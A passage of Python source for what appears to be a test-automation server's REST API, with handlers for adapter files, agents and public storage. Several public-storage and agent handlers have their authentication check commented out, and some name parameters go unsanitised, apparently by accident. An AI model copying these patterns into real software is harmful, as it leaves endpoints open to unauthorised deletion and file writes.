type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ project-id, file-name, file-path, file-extension ]
properties:
project-id:
type: integer
file-name:
type: string
file-path:
type: string
file-extension:
type: string
destination:
type: object
required: [ project-id, file-name ]
properties:
project-id:
type: integer
file-name:
type: string
responses:
'200':
description: rename response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/file/rename",
"message": "file successfully renamed"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify a source")
fileName = self.request.data.get("source")["file-name"]
if fileName is None:
raise EmptyValue("Please specify a source filename")
filePath = self.request.data.get("source")["file-path"]
if filePath is None:
raise EmptyValue("Please specify a source file path")
fileExt = self.request.data.get("source")["file-extension"]
if fileExt is None:
raise EmptyValue("Please specify a source file extension")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify a destination")
newFileName = self.request.data.get("destination")["file-name"]
if newFileName is None:
raise EmptyValue("Please specify a destination file name")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
success = RepoAdapters.instance().renameFile(
mainPath=filePath,
oldFilename=fileName,
newFilename=newFileName,
extFilename=fileExt
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to rename file")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Rename file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
return {"cmd": self.request.path, "message": "file sucessfully renamed",
"file-path": filePath,
"file-name": fileName,
"file-extension": fileExt,
"new-file-name": newFileName}
class AdaptersDirectoryRename(HandlerCORS):
"""
/rest/adapters/directory/rename
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: Rename directory in the adapters storage
description: ''
operationId: adaptersDirectoryRename
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ project-id, directory-name, directory-path ]
properties:
project-id:
type: integer
directory-name:
type: string
directory-path:
type: string
destination:
type: object
required: [ project-id, directory-name ]
properties:
project-id:
type: integer
directory-name:
type: string
responses:
'200':
description: rename response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/directory/rename",
"message": "directory successfully renamed"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify a source")
folderName = self.request.data.get("source")["directory-name"]
if folderName is None:
raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("source")["directory-path"]
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify a destination")
newFolderName = self.request.data.get(
"destination")["directory-name"]
if newFolderName is None:
raise EmptyValue("Please specify a destination folder name")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
success = RepoAdapters.instance().renameDir(mainPath=folderPath, oldPath=folderName,
newPath=newFolderName)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to rename directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500(
"Unable to rename directory: source directory not found")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path, "message": "directory successfully renamed",
"directory-name": folderName, "directory-path": folderPath,
"new-directory-name": newFolderName}
class AdaptersFileDuplicate(HandlerCORS):
"""
/rest/adapters/file/duplicate
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: Duplicate file in the adapters storage
description: ''
operationId: adaptersFileDuplicate
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ project-id, file-name, file-path, file-extension ]
properties:
project-id:
type: integer
file-name:
type: string
file-path:
type: string
file-extension:
type: string
destination:
type: object
required: [ project-id, file-name ]
properties:
project-id:
type: integer
file-name:
type: string
responses:
'200':
description: rename response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/file/rename",
"message": "file successfully renamed"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify a source")
fileName = self.request.data.get("source")["file-name"]
if fileName is None:
raise EmptyValue("Please specify a source filename")
filePath = self.request.data.get("source")["file-path"]
if filePath is None:
raise EmptyValue("Please specify a source file path")
fileExt = self.request.data.get("source")["file-extension"]
if fileExt is None:
raise EmptyValue("Please specify a source file extension")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify a destination")
newFileName = self.request.data.get("destination")["file-name"]
if newFileName is None:
raise EmptyValue("Please specify a destination file name")
newFilePath = self.request.data.get("destination")["file-path"]
if newFilePath is None:
raise EmptyValue("Please specify a destination file path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
newFilePath = os.path.normpath("/" + newFilePath)
success = RepoAdapters.instance().duplicateFile(
mainPath=filePath,
oldFilename=fileName,
newFilename=newFileName,
extFilename=fileExt,
newMainPath=newFilePath
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to duplicate file")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Duplicate file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
return {"cmd": self.request.path,
"message": "file sucessfully duplicated"}
class AdaptersDirectoryDuplicate(HandlerCORS):
"""
/rest/adapters/directory/duplicate
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: Duplicate directory in the adapters storage
description: ''
operationId: adaptersDirectoryDuplicate
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ directory-name, directory-path ]
properties:
directory-name:
type: string
directory-path:
type: string
destination:
type: object
required: [ directory-name ]
properties:
directory-name:
type: string
directory-path:
type: string
responses:
'200':
description: rename response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/directory/rename",
"message": "directory successfully renamed"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
# get the user profile
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
# checking json request on post
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify a source")
folderName = self.request.data.get("source")["directory-name"]
if folderName is None:
raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("source")["directory-path"]
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify a destination")
newFolderName = self.request.data.get(
"destination")["directory-name"]
if newFolderName is None:
raise EmptyValue("Please specify a destination folder name")
newFolderPath = self.request.data.get(
"destination")["directory-path"]
if newFolderPath is None:
raise EmptyValue("Please specify a destination folder path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# some security check to avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
newFolderPath = os.path.normpath("/" + newFolderPath)
# all ok, do the duplication
success = RepoAdapters.instance().duplicateDir(
mainPath=folderPath,
oldPath=folderName,
newPath=newFolderName,
newMainPath=newFolderPath
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to duplicate directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500(
"Unable to duplicate directory: source directory not found")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path,
"message": "directory successfully duplicated"}
class AdaptersFileRemove(HandlerCORS):
"""
/rest/adapters/file/remove
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: remove file in the adapters storage
description: ''
operationId: adaptersFileRemove
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ file-path ]
properties:
file-path:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/file/remove",
"message": "file successfully removed"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
filePath = self.request.data.get("file-path")
if not filePath:
raise EmptyValue("Please specify a file path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
success = RepoAdapters.instance().delFile(pathFile=filePath)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to remove file")
if success == Context.instance().CODE_FAILED:
raise HTTP_403("Remove file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
return {"cmd": self.request.path,
"message": "file successfully removed"}
class AdaptersFileUnlock(HandlerCORS):
"""
/rest/adapters/file/unlock
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: unlock file in the adapters storage
description: ''
operationId: adaptersFileUnlock
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ file-path, file-name, file-extension ]
properties:
file-path:
type: string
file-name:
type: string
file-extension:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/file/unlock",
"message": "file successfully unlocked"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a source filepath")
fileName = self.request.data.get("file-name")
if fileName is None:
raise EmptyValue("Please specify a source file filename")
fileExt = self.request.data.get("file-extension")
if fileExt is None:
raise EmptyValue("Please specify a source file extension")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
success = RepoAdapters.instance().unlockFile(pathFile=filePath,
nameFile=fileName,
extFile=fileExt,
login=user_profile["login"])
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to unlock adapter file")
return {"cmd": self.request.path,
"message": "file successfully unlocked"}
class AdaptersDirectoryRemove(HandlerCORS):
"""
/rest/adapters/directory/remove
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: remove directory in the adapters storage
description: ''
operationId: adaptersDirectoryRemove
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ directory-path ]
properties:
directory-path:
type: string
recursive:
type: boolean
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/directory/remove",
"message": "directory successfully removed"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
folderPath = self.request.data.get("directory-path")
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
success = RepoAdapters.instance().delDir(folderPath)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to remove directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500("Unable to remove directory (missing)")
if success == Context.instance().CODE_FORBIDDEN:
raise HTTP_403("Cannot remove directory")
return {"cmd": self.request.path,
"message": "directory successfully removed"}
class AdaptersDirectoryAdd(HandlerCORS):
"""
/rest/adapters/directory/add
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: Add directory in the adapters storage
description: ''
operationId: adaptersDirectoryAdd
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ directory-name, directory-path ]
properties:
directory-name:
type: string
directory-path:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/directory/add",
"message": "directory successfully added"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
folderName = self.request.data.get("directory-name")
if folderName is None:
raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("directory-path")
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
success = RepoAdapters.instance().addDir(
pathFolder=folderPath, folderName=folderName)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to add directory")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path,
"message": "directory successfully added"}
class AdaptersFileUpload(HandlerCORS):
"""
/rest/adapters/file/upload
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: Upload file the test storage
description: ''
operationId: adaptersFileUpload
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, file-path, file-name, file-extension, file-content ]
properties:
project-id:
type: integer
file-path:
type: string
file-name:
type: string
file-extension:
type: string
file-content:
type: string
overwrite:
type: boolean
close-after:
type: boolean
add-folders:
type: boolean
responses:
'200':
schema :
properties:
cmd:
type: string
code:
type: integer
examples:
application/json: |
{
"cmd": "/adapters/file/upload",
"code": 200
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a file path")
fileName = self.request.data.get("file-name")
if fileName is None:
raise EmptyValue("Please specify a file name")
fileExt = self.request.data.get("file-extension")
if fileExt is None:
raise EmptyValue("Please specify a file extension")
fileContent = self.request.data.get("file-content")
if fileContent is None:
raise EmptyValue("Please specify a file content")
_overwrite = self.request.data.get("overwrite", False)
_closeafter = self.request.data.get("close-after", False)
_addfolders = self.request.data.get("add-folders", False)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
putFileReturn = RepoAdapters.instance().uploadFile(pathFile=filePath,
nameFile=fileName,
extFile=fileExt,
contentFile=fileContent,
login=user_profile['login'],
project='',
overwriteFile=_overwrite,
createFolders=_addfolders,
lockMode=True,
binaryMode=True,
closeAfter=_closeafter)
success, pathFile, nameFile, extFile, _, overwriteFile, closeAfter, isLocked, lockedBy = putFileReturn
return {"cmd": self.request.path,
"code": success,
"file-path": pathFile,
"file-name": nameFile,
"file-extension": extFile,
"overwrite": overwriteFile,
"close-after": closeAfter,
"locked": isLocked,
"locked-by": lockedBy}
class AdaptersFileDownload(HandlerCORS):
"""
/rest/adapters/file/download
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: download file from the test storage
description: ''
operationId: adaptersFileDownload
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, file-path ]
properties:
project-id:
type: integer
file-path:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
file-content:
type: string
examples:
application/json: |
{
"cmd": "/adapters/file/download",
"file-content": "...."
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a file path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
success, _, _, _, content, _, _ = RepoTests.instance().getFile(pathFile=filePath,
binaryMode=True,
project=projectId,
addLock=False)
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500("Unable to download file")
return {"cmd": self.request.path, "file-content": content}
class AdaptersFileOpen(HandlerCORS):
"""
/rest/adapters/file/open
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: open and lock file from the test storage
description: ''
operationId: adaptersFileOpen
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, file-path ]
properties:
project-id:
type: integer
file-path:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
file-content:
type: string
examples:
application/json: |
{
"cmd": "/adapters/file/open",
"file-content": "...."
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a file path")
_ignoreLock = self.request.data.get("ignore-lock", False)
_readOnly = self.request.data.get("read-only", False)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
resultGetFile = RepoAdapters.instance().getFile(pathFile=filePath,
login=user_profile['login'],
forceOpen=_ignoreLock,
readOnly=_readOnly)
success, path_file, name_file, ext_file, project, data_base64, locked, locked_by = resultGetFile
if success != Context.instance().CODE_OK:
raise HTTP_500("Unable to open adapter file")
return {"cmd": self.request.path,
"file-content": data_base64,
"file-path": path_file,
"file-name": name_file,
"file-extension": ext_file,
"locked": locked,
"locked-by": locked_by,
"project-id": project}
"""
Agents handlers
"""
class AgentsRunning(HandlerCORS):
"""
/rest/agents/running
"""
@_to_yaml
def get(self):
"""
tags:
- agents
summary: Get all running agents
description: ''
operationId: agentsRunning
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
responses:
'200':
description: running agents
schema :
properties:
cmd:
type: string
agents-running:
type: array
items:
type: string
examples:
application/json: |
{
"cmd": "/agents/running",
"agents-running": ...
}
"""
# user_profile = _get_user(request=self.request)
running = AgentsManager.instance().getRunning()
return {"cmd": self.request.path, "agents": running}
class AgentsDisconnect(HandlerCORS):
"""
/rest/agents/disconnect
"""
@_to_yaml
def post(self):
"""
tags:
- agents
summary: Disconnect a agent by the name
description: ''
operationId: agentsDisconnect
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ agent-name ]
properties:
agent-name:
type: string
responses:
'200':
description:
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/agents/disconnect",
"message: "agent successfully disconnected"
}
'400':
description: Bad request provided
'404':
description: Agent not found
"""
# user_profile = _get_user(request=self.request)
try:
agentName = self.request.data.get("agent-name")
if agentName is None:
raise HTTP_400("Please specify a agent name")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
disconnected = AgentsManager.instance().disconnectAgent(name=agentName)
if disconnected == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("agent not found")
return {"cmd": self.request.path,
"message": "agent successfully disconnected"}
"""
Public storage handlers
"""
class PublicListing(HandlerCORS):
"""
/rest/public/listing/basic
"""
def get(self):
"""
tags:
- public
summary: Get the listing of all files and folders in the public area
description: ''
operationId: publicListing
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
responses:
'200':
description: Listing file in public area
schema :
properties:
cmd:
type: string
public-listing:
type: array
items:
type: string
examples:
application/json: |
{
"public-listing": [],
"cmd": "/public/listing/basic"
}
'401':
description: Access denied
"""
# user_profile = _get_user(request=self.request)
listing = RepoPublic.instance().getBasicListing()
return {"cmd": self.request.path, "public-listing": listing}
class PublicDirectoryAdd(HandlerCORS):
"""
/rest/public/directory/add
"""
def post(self):
"""
tags:
- public
summary: Add directory in the public storage
description: ''
operationId: publicDirectoryAdd
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ directory-path, directory-name ]
properties:
directory-path:
type: string
directory-name:
type: string
responses:
'200':
description: Directory successfully added
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"message": "directory successfully added",
"cmd": "/public/directory/add"
}
'401':
description: Access denied
'400':
description: Bad request
'403':
description: Directory already exists
'500':
description: Server error
"""
# user_profile = _get_user(request=self.request)
try:
folderName = self.request.data.get("directory-name")
if folderName is None:
raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("directory-path")
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
success = RepoPublic.instance().addDir(
pathFolder=folderPath, folderName=folderName)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to add directory")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path,
"message": "directory successfully added"}
class PublicDirectoryRename(HandlerCORS):
"""
/rest/public/directory/rename
"""
def post(self):
"""
tags:
- public
summary: Rename directory name in the public storage
description: ''
operationId: publicDirectoryRename
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ directory-path, directory-name ]
properties:
directory-name:
type: string
directory-path:
type: string
destination:
type: object
required: [ directory-name ]
properties:
directory-name:
type: string
responses:
'200':
description: Directory successfully renamed
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"message": "directory successfully renamed",
"cmd": "/public/directory/rename"
}
'401':
description: Access denied
'400':
description: Bad request
'403':
description: Directory already exists
'500':
description: Server error
"""
# user_profile = _get_user(request=self.request)
try:
folderName = self.request.data.get("source")["directory-name"]
if folderName is None:
raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("source")["directory-path"]
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
newFolderName = self.request.data.get(
"destination")["directory-name"]
if newFolderName is None:
raise EmptyValue("Please specify a destination folder name")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
success = RepoTests.instance().renameDir(mainPath=folderPath, oldPath=folderName,
newPath=newFolderName)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to rename directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500(
"Unable to rename directory: source directory not found")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path,
"message": "directory successfully renamed"}
class PublicDirectoryRemove(HandlerCORS):
"""
/rest/public/directory/remove
"""
def post(self):
"""
tags:
- public
summary: Remove directory in the public storage and their contents recursively
description: ''
operationId: publicDirectoryRemove
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source ]
properties:
source:
type: object
required: [ directory-path ]
properties:
directory-path:
type: string
recursive:
type: boolean
responses:
'200':
description: Directory successfully removed
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"message": "directory successfully removed",
"cmd": "/public/directory/remove"
}
'401':
description: Access denied
'400':
description: Bad request
'403':
description: Cannot remove directory | Removing directory denied
'500':
description: Server error
"""
# user_profile = _get_user(request=self.request)
try:
folderPath = self.request.data.get("source")["directory-path"]
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
_recursive = self.request.data.get("recursive", False)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
if _recursive:
success = RepoTests.instance().delDirAll(folderPath)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to remove directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500("Unable to remove directory (missing)")
if success == Context.instance().CODE_FORBIDDEN:
raise HTTP_403("Removing directory denied")
else:
success = RepoTests.instance().delDir(folderPath)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to remove directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500("Unable to remove directory (missing)")
if success == Context.instance().CODE_FORBIDDEN:
raise HTTP_403("Cannot remove directory")
return {"cmd": self.request.path,
"message": "directory successfully removed"}
class PublicImport(HandlerCORS):
"""
/rest/public/file/import
"""
def post(self):
"""
tags:
- public
summary: Import file to the public storage. Provide the file in base64 format
description: ''
operationId: publicFileImport
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ file-path, file-content ]
properties:
file-path:
type: string
file-content:
type: string
string: in base64 format
responses:
'200':
description: File sucessfully imported
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"message": "file sucessfully imported",
"cmd": "/public/file/import"
}
'401':
description: Access denied
'400':
description: Bad request
'403':
description: File already exists
'500':
description: Server error
"""
# user_profile = _get_user(request=self.request)
try:
filePath = self.request.data.get("file-path")
fileContent = self.request.data.get("file-content")
if not filePath and not fileContent:
raise EmptyValue(
"Please specify a project name, file content and path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
_filePath, fileExtension = filePath.rsplit(".", 1)
_filePath = _filePath.rsplit("/", 1)
if len(_filePath) == 2:
filePath = _filePath[0]
fileName = _filePath[1]
else:
filePath = "/"
fileName = _filePath[0]
success, _, _, _, _ = RepoTests.instance().importFile(pathFile=filePath, nameFile=fileName, extFile=fileExtension,
contentFile=fileContent, binaryMode=True)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to add file")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("File already exists")
return {"cmd": self.request.path,
"message": "file sucessfully imported"}
class PublicRemove(HandlerCORS):
"""
/rest/public/file/remove
"""
def post(self):
"""
tags:
- public
summary: Import file to the public storage. Provide the file in base64 format
description: ''
operationId: publicFileRemove
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ file-path, file-content ]
properties:
file-path:
type: string
file-content:
type: string
string: in base64 format
responses:
'200':
description: File sucessfully imported
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"message": "file sucessfully imported",
"cmd": "/public/file/import"
}
'401':
description: Access denied
'400':
description: Bad request
'403':
description: File already exists
'500':
description: Server error
"""
# user_profile = _get_user(request=self.request)
try:
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a project name and file path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
success = RepoTests.instance().delFile(
pathFile=filePath, supportSnapshot=False)
if success == Context.instance().CODE_ERROR:
